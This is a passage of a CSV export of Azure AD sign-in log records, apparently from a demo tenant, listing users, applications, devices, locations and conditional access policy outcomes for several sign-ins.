'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5afde7f0-808d-4fd5-9a61-613425f70d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5afde7f0-808d-4fd5-9a61-613425f70d00,SigninLogs,Sucess,50.6406517,5.572050095
+796,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:58.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6197525-44e0-4706-8a05-f4db944a1613,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f677c811-7d36-4500-96e1-6582ffd60e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f677c811-7d36-4500-96e1-6582ffd60e00,SigninLogs,Sucess,50.6406517,5.572050095
+797,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7bc57bb-7b0d-4210-9e16-566cd12f6f73,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f677c811-7d36-4500-96e1-658218d80e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f677c811-7d36-4500-96e1-658218d80e00,SigninLogs,Sucess,50.6406517,5.572050095
+798,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:33.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a2ff6083-2da5-459b-8e38-d65fd5c90700,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a2ff6083-2da5-459b-8e38-d65fd5c90700,SigninLogs,Sucess,51.4458313,-0.969720006
+799,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd924d18-381e-43ce-a85f-006b34ca94a6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c457a232-7a13-4abd-a93c-6f0a47e00d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c457a232-7a13-4abd-a93c-6f0a47e00d00,SigninLogs,Sucess,50.6406517,5.572050095
+800,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,470756b1-d632-49da-89cf-6493ec789eab,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8ccd2b23-7303-4913-b6ad-5087cda60d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,8ccd2b23-7303-4913-b6ad-5087cda60d00,SigninLogs,Sucess,50.6406517,5.572050095
+801,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:38.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20b34019-d4f1-483e-baa8-ea13e9069319,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3b25eb5-284d-4091-85e8-2c1110e40d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d3b25eb5-284d-4091-85e8-2c1110e40d00,SigninLogs,Sucess,50.6406517,5.572050095
+802,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:49.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,afdcfd6d-1cfb-46d9-ac57-6b8b2d69299a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4aca3199-2681-43b9-9160-589c2c8c0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,4aca3199-2681-43b9-9160-589c2c8c0d00,SigninLogs,Sucess,50.6406517,5.572050095
+803,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f4c7046a-cf1b-486b-acc6-fc27730dc643,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 